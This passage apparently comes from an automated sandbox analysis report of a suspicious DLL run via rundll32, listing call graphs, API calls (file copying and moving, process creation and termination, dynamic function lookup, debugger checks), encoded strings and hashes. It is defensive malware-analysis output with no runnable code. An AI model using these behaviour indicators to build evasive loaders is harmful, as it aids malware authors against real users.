6f9e2303 14169->14202 14171 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14170->14171 14172 6f9e1f61 14171->14172 14172->14166 14173 6f9e11aa __DllMainCRTStartup@12 54 API calls 14172->14173 14174 6f9e2057 14173->14174 14175 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14174->14175 14176 6f9e207f 14175->14176 14177 6f9e208e 14176->14177 14178 6f9e1053 __DllMainCRTStartup@12 85 API calls 14176->14178 14179 6f9e11aa __DllMainCRTStartup@12 54 API calls 14177->14179 14178->14177 14180 6f9e20ad 14179->14180 14181 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14180->14181 14182 6f9e20d5 14181->14182 14182->14166 14183 6f9e11aa __DllMainCRTStartup@12 54 API calls 14182->14183 14184 6f9e2179 14183->14184 14185 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14184->14185 14186 6f9e219f 14185->14186 14187 6f9e11aa __DllMainCRTStartup@12 54 API calls 14186->14187 14188 6f9e21bc 14187->14188 14189 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14188->14189 14190 6f9e21e4 14189->14190 14190->14166 14191 6f9e21fc SysAllocString 14190->14191 14192 6f9e236f 14191->14192 14193 6f9e221c VariantInit VariantInit 14191->14193 14354 6f9e2c70 mydllmain 14192->14354 14195 6f9e11aa __DllMainCRTStartup@12 54 API calls 14193->14195 14197 6f9e225f 14195->14197 14198 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14197->14198 14199 6f9e22b2 VariantClear VariantClear VariantClear 14198->14199 14199->14166 14202->14160 14204 6f9eb924 14203->14204 14205 6f9eb912 GetLastError 14203->14205 14204->13807 14418 6f9ee757 14205->14418 14426 6f9eb0ab 14208->14426 14213 6f9e2e45 _ValidateLocalCookies 5 API calls 14215 6f9e1cf6 14213->14215 14215->13782 14219 6f9eb0ab __DllMainCRTStartup@12 54 API calls 14220 6f9e1ac7 ___std_exception_copy 14219->14220 14454 6f9ebf16 14220->14454 14222 6f9e1aea __DllMainCRTStartup@12 14457 6f9eae5d 14222->14457 14226 6f9e1b33 14226->14213 14241 6f9e254d __DllMainCRTStartup@12 14240->14241 14242 6f9e253d 14240->14242 14241->14122 14242->14241 14245 6f9ec286 14242->14245 14246 

              Control-flow Graph

              APIs
              • FindFirstFileW.KERNELBASE(?,00000000,F9A742C7,%s%s,00000000,00000000), ref: 6F9E16D8
              • _strlen.LIBCMT ref: 6F9E17B1
              • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6F9E1809
                • Part of subcall function 6F9E1CFA: CoInitialize.OLE32(00000000), ref: 6F9E1D40
                • Part of subcall function 6F9E1CFA: CoCreateInstance.OLE32(6F9FB200,00000000,00000001,6F9FB1F0,?), ref: 6F9E1D59
                • Part of subcall function 6F9E1CFA: CoUninitialize.OLE32 ref: 6F9E1D70
              • CopyFileW.KERNEL32(?,?,00000000), ref: 6F9E191C
              • Sleep.KERNEL32(000003E8), ref: 6F9E1927
                • Part of subcall function 6F9EB8FB: MoveFileExW.KERNEL32(?,6F9E1940,00000002,?,6F9E1940,?,?), ref: 6F9EB908
                • Part of subcall function 6F9EB8FB: GetLastError.KERNEL32 ref: 6F9EB912
                • Part of subcall function 6F9EB8FB: __dosmaperr.LIBCMT ref: 6F9EB919
              • TerminateProcess.KERNEL32(00000000), ref: 6F9E1953
              • CloseHandle.KERNEL32 ref: 6F9E195F
              • CloseHandle.KERNEL32 ref: 6F9E1967
              • TerminateProcess.KERNEL32(00000000), ref: 6F9E19C4
              • CloseHandle.KERNEL32 ref: 6F9E19D0
              • CloseHandle.KERNEL32 ref: 6F9E19D8
              • FindNextFileW.KERNELBASE(00000000,?), ref: 6F9E19ED
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: CloseFileHandle$FindProcessTerminate$CopyCreateEnvironmentErrorExpandFirstInitializeInstanceLastMoveNextSleepStringsUninitialize__dosmaperr_strlen
              • String ID: %s%s$%s\%s$%s\*.*$%sk$-s 3600 -f 0 -t _ -m _ -a 11 -u $IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7B$PT30S$WlrMakeService$wlrmdr.exe
              • API String ID: 3479604460-3724355521
              • Opcode ID: 865d66bfa23dd2daa7db51eadbdcba607887d4989aaba24b489d03dfd68a548e
              • Instruction ID: 2b3570ad5de0d49ab488c1ca6e9674aea4e97dff0f1587f219a45bb17a011366
              • Opcode Fuzzy Hash: 865d66bfa23dd2daa7db51eadbdcba607887d4989aaba24b489d03dfd68a548e
              • Instruction Fuzzy Hash: A7B19271904349AADF21DFA4DC49BEE37B8BF19318F00822AE908961C1EB759A85CB51

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6F9E29A3
              • GetEnvironmentVariableW.KERNEL32(?,?,00000032,?,?,?,?,?,?,?,?,?,00000001,00000000,?,00000000), ref: 6F9E29F6
                • Part of subcall function 6F9E1274: GetModuleHandleW.KERNEL32(kernel32.dll,000000C8,00000000,6FA00E3C), ref: 6F9E12AB
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E12CA
                • Part of subcall function 6F9E1274: GetProcAddress.KERNEL32(?), ref: 6F9E1318
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E1336
                • Part of subcall function 6F9E1274: GetProcAddress.KERNEL32(?), ref: 6F9E137E
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E13A1
              • _strlen.LIBCMT ref: 6F9E2A1C
                • Part of subcall function 6F9E140F: _strlen.LIBCMT ref: 6F9E148D
                • Part of subcall function 6F9E140F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04464), ref: 6F9E151B
              • Sleep.KERNELBASE(000005DC), ref: 6F9E2A74
              • Sleep.KERNELBASE(00007530), ref: 6F9E2A7B
              • _strlen.LIBCMT ref: 6F9E2A9A
              • _strlen.LIBCMT ref: 6F9E2AFD
                • Part of subcall function 6F9E1629: FindFirstFileW.KERNELBASE(?,00000000,F9A742C7,%s%s,00000000,00000000), ref: 6F9E16D8
                • Part of subcall function 6F9E1629: FindNextFileW.KERNELBASE(00000000,?), ref: 6F9E19ED
              Strings
              • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6F9E2A7D
              • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6F9E2983
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6F9E2A01
              • %s%s, xrefs: 6F9E2AC1, 6F9E2AC7, 6F9E2B2A
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6F9E2AE2
              Similarity
              • API ID: _strlen$AddressFileFindProcSleep$CreateEnvironmentFirstHandleModuleNextProcessVariable
              • String ID: %s%s$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
              • API String ID: 2056693606-1305241286
              • Opcode ID: df55d3a155478a89b3f0b06dd6e76a05333401030271a5f2c61872b7ee2740d8
              • Instruction ID: 17d94b2857fc7741f245efeb471b1fcccb32c793a4b521c6de76663591f44adb
              • Opcode Fuzzy Hash: df55d3a155478a89b3f0b06dd6e76a05333401030271a5f2c61872b7ee2740d8
              • Instruction Fuzzy Hash: B351FEB1904345ABD725DB60E880DEB77ECFF9924CF40492DA549932C1EB35EA05CB62

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6F9E148D
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04464), ref: 6F9E151B
              • _strlen.LIBCMT ref: 6F9E1573
              • Sleep.KERNELBASE(000003E8), ref: 6F9E15EB
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04480), ref: 6F9E160C
              Strings
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6F9E1558
              • %s %s, xrefs: 6F9E14E4, 6F9E15CC
              • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6F9E146E
              Similarity
              • API ID: CreateProcess_strlen$Sleep
              • String ID: %s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
              • API String ID: 688041527-2059495477
              • Opcode ID: f392528dd9747850c67de7894e4d38d4821dd312b5f699fb2f2911e59873dbb5
              • Instruction ID: 0a2ed944832ab80346731a79398aa8db3c606314b1904ac9d2d30e768f9b2d10
              • Opcode Fuzzy Hash: f392528dd9747850c67de7894e4d38d4821dd312b5f699fb2f2911e59873dbb5
              • Instruction Fuzzy Hash: CC5161B2504344BEE321DB64DC85FABB7ECEF99248F40482DB648D31C1EB74E9448B66

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6F9E305A
              • ___scrt_uninitialize_crt.LIBCMT ref: 6F9E3074
              Similarity
              • API ID: Initialize___scrt_uninitialize_crt
              • String ID:
              • API String ID: 2442719207-0
              • Opcode ID: 08a5ccfb64dd6d1db816cfbae6590f655f48eb6b415d1fce6836fc06bceb3bac
              • Instruction ID: 2838cea00fcf763d6ca778bbbb107e5b8b1a72ecfc90231cdc09bd71a6973925
              • Opcode Fuzzy Hash: 08a5ccfb64dd6d1db816cfbae6590f655f48eb6b415d1fce6836fc06bceb3bac
              • Instruction Fuzzy Hash: 4141B172D04714EEDB228FB5D842FAE7E79EF817A9F00411AE814562E1D731D9068FA0

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: dllmain_raw$dllmain_crt_dispatch
              • String ID:
              • API String ID: 3136044242-0
              • Opcode ID: a76b709614151968b494c9b7d4a54c37225d2d521a341383d6d2daae4fe11e71
              • Instruction ID: 3cfb22a009475ad28d025200fece35524928e05d4f0d5e0287fb5159dbdaf047
              • Opcode Fuzzy Hash: a76b709614151968b494c9b7d4a54c37225d2d521a341383d6d2daae4fe11e71
              • Instruction Fuzzy Hash: 17217C72E04715EECB338F75C842EAF3E79AF81B95B00411AF8145A2E1D731DD418BA0

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6F9E2F59
                • Part of subcall function 6F9E385E: mydllmain.DLL1(00000001,00000000,00000001,6F9E2F5E,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001), ref: 6F9E3877
                • Part of subcall function 6F9E3428: InitializeSListHead.KERNEL32(6FA03D60,6F9E2F63,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8), ref: 6F9E342D
                • Part of subcall function 6F9EC38F: mydllmain.DLL1(?,6F9EAAAA,?,6F9EC639,6F9FB194,6F9FB198,6FA02248,00000014,6F9EC571,6FA02268,00000008,6F9EC6F9,6F9E6503,?,B586E81C,F9A742C7), ref: 6F9EC3A6
              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F9E2FC3
              • mydllmain.DLL1(?,00000002,00000001,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001,?), ref: 6F9E2FD9
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain$Initialize$HeadList___scrt_is_nonwritable_in_current_image
              • String ID:
              • API String ID: 1337761313-0
              • Opcode ID: 0e771cbaadb0c3c276046ba51d543496db5c172226b7bc970c9b55ed07a4ac0a
              • Instruction ID: b97925093bbd51652eede3a5556f00390acfe1ff0f7d462d8c0bc127fa2994aa
              • Opcode Fuzzy Hash: 0e771cbaadb0c3c276046ba51d543496db5c172226b7bc970c9b55ed07a4ac0a
              • Instruction Fuzzy Hash: 5921D572A08702AADF135FB5D802FDD3F616F6637CF10481AD4856B1D2DB32D056C612

              Control-flow Graph (rendered graph omitted)
              APIs
              • mydllmain.DLL1(00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?,?), ref: 6F9F2EAA
              • mydllmain.DLL1(00000000,00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?), ref: 6F9F2EDA
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: db44138d5476bce643345ed35bfeae61f6856f6db0661a7a4afa86fe4605d2e8
              • Instruction ID: 6f31454d5a35569047882b67defe9587e3a8c6f2a3edcfb6ad8386f54621df05
              • Opcode Fuzzy Hash: db44138d5476bce643345ed35bfeae61f6856f6db0661a7a4afa86fe4605d2e8
              • Instruction Fuzzy Hash: C301A232A0669497DF229E599CC43EAB36D9F51220B21052EEC7A6B2C0C771FC4687A0

              Control-flow Graph (rendered graph omitted)
              APIs
              • mydllmain.DLL1(00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?,?), ref: 6F9F2EAA
              • mydllmain.DLL1(00000000,00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?), ref: 6F9F2EDA
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: 157b67d090d7dbf46f6b7ee6b837fdeedfd49d8a45799cbc4cc7e21b528c7489
              • Instruction ID: 306308cec314d3d4e74cb6ca6f566e4aeb82a701340c2a867a4e01a15f8a8999
              • Opcode Fuzzy Hash: 157b67d090d7dbf46f6b7ee6b837fdeedfd49d8a45799cbc4cc7e21b528c7489
              • Instruction Fuzzy Hash: A701FC32A066845BDF129E18DCC43AAB36C9F51224B21052EDC766F1C1C735F8468790

              Control-flow Graph (rendered graph omitted)
              APIs
              • RtlAllocateHeap.NTDLL(00000008,00000001,6F9EAAAA,?,6F9EDA5C,00000001,00000364,00000006,000000FF,6F9EAAAA,6F9EAAAA,?,6F9E64D2,6F9EC1F7,F08BD84D), ref: 6F9EFA19
                • Part of subcall function 6F9EC30C: mydllmain.DLL1(?,00000001,?,6F9EFA0B,00000001,?,6F9EDA5C,00000001,00000364,00000006,000000FF,6F9EAAAA,6F9EAAAA,?,6F9E64D2,6F9EC1F7), ref: 6F9EC322
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: AllocateHeapmydllmain
              • String ID:
              • API String ID: 2479503475-0
              • Opcode ID: 770f530231a20ccf6c6378675263a69336955838bc26cfad333a7bc42b228042
              • Instruction ID: 793bc27fe7137431ded9fd8a40187b7b36361ab248c44a1d3b11f6180b3413a5
              • Opcode Fuzzy Hash: 770f530231a20ccf6c6378675263a69336955838bc26cfad333a7bc42b228042
              • Instruction Fuzzy Hash: 37F0B436345626ABEF535A26B905A9A379CBF8577CB118117AC18AE1C4FB20E40186E1

              Control-flow Graph (rendered graph omitted)
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: a6d17202687152cbcfb55542fb7a407863c434a54d7a9ee4ffc0fdb367169027
              • Instruction ID: 9000987cb098be165034ac60058ec63f69ca38bdac99d9a8f45fba4bf5daea90
              • Opcode Fuzzy Hash: a6d17202687152cbcfb55542fb7a407863c434a54d7a9ee4ffc0fdb367169027
              • Instruction Fuzzy Hash: 16B09B3559534296E2415B60444CB1D77545F52257F04C415E169800D4CA20C0958A72
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f16893357eab88c71203644af9a81a3f4eae31f83bff0b40e1d198b84c0f35b
              • Instruction ID: 6e0fe9c455517ca4ead514f86fe4a5d5c69521affc67d2775cd3a8e353982d36
              • Opcode Fuzzy Hash: 6f16893357eab88c71203644af9a81a3f4eae31f83bff0b40e1d198b84c0f35b
              • Instruction Fuzzy Hash: 96025E71E012199BDB14CFADDA806DEB7F5FF88314F14826AD915EB384D731A9428F90
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6F9E374D
              • IsDebuggerPresent.KERNEL32 ref: 6F9E3819
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9E3832
              • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9E383C
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              • Opcode ID: 1a7f7cc68f09033e737cc48678ab252b08f60f4fc2fa83e7180a00bb4beb8df7
              • Instruction ID: a35412e01fa201132d4c5444e81ecfd5f67bf1429ad383b26fa6d6b0c2bcf7c0
              • Opcode Fuzzy Hash: 1a7f7cc68f09033e737cc48678ab252b08f60f4fc2fa83e7180a00bb4beb8df7
              • Instruction Fuzzy Hash: D6310875D05319EBDF21DFA4D949BCDBBB8AF18304F1041EAE40DAB290EB719A848F45
              APIs
              • GetModuleHandleW.KERNEL32(kernel32.dll,000000C8,00000000,6FA00E3C), ref: 6F9E12AB
              • _strlen.LIBCMT ref: 6F9E12CA
              • GetProcAddress.KERNEL32(?), ref: 6F9E1318
              • _strlen.LIBCMT ref: 6F9E1336
              • GetProcAddress.KERNEL32(?), ref: 6F9E137E
              • _strlen.LIBCMT ref: 6F9E13A1
              • GetProcAddress.KERNEL32(?), ref: 6F9E13E7
              Strings
              • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6F9E138B
              • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6F9E12B1
              • kernel32.dll, xrefs: 6F9E12A6
              • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6F9E1320
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: AddressProc_strlen$HandleModule
              • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
              • API String ID: 3538810943-2765630095
              • Opcode ID: a05f8d45d7267224055fceed0a656bf5fe71c851f62b4e2f17c4690b53eb4f9d
              • Instruction ID: d6edb42e3ec7574594b70c827e0a6a6c5876ce9c5f3f3e786e12283e5015a1b7
              • Opcode Fuzzy Hash: a05f8d45d7267224055fceed0a656bf5fe71c851f62b4e2f17c4690b53eb4f9d
              • Instruction Fuzzy Hash: 3F41A171D007489BDB26DFF4EC909AE7BB8BF69208F54842ED951D3282EB359905CB10
              APIs
                • Part of subcall function 6F9F6340: CreateFileW.KERNEL32(00000000,00000000,?,6F9F66A2,?,?,00000000,?,6F9F66A2,00000000,0000000C), ref: 6F9F635D
              • GetLastError.KERNEL32 ref: 6F9F670D
              • __dosmaperr.LIBCMT ref: 6F9F6714
              • GetFileType.KERNEL32(00000000), ref: 6F9F6720
              • GetLastError.KERNEL32 ref: 6F9F672A
              • __dosmaperr.LIBCMT ref: 6F9F6733
              • CloseHandle.KERNEL32(00000000), ref: 6F9F6753
              • CloseHandle.KERNEL32(00000000), ref: 6F9F68A0
              • GetLastError.KERNEL32 ref: 6F9F68D2
              • __dosmaperr.LIBCMT ref: 6F9F68D9
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: 33078b5a48b1cb3652776a81294ff222925e90476b64218e58754a2518311b84
              • Instruction ID: 828bf70aabec8da5f72e49fbffe0f4d003aabd93dbe7dc05b85f7a33ae7ee12c
              • Opcode Fuzzy Hash: 33078b5a48b1cb3652776a81294ff222925e90476b64218e58754a2518311b84
              • Instruction Fuzzy Hash: 2CA10E32A157059BCF099F68D851BAD3BB5AF07328F28025DE8119F2D2CB35D823CB91
              APIs
              • mydllmain.DLL1(00000000,?), ref: 6F9F6A97
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: 42af1bba095e08f3a14e334087738255b175f57d1233d889ccf1f4d9190aca35
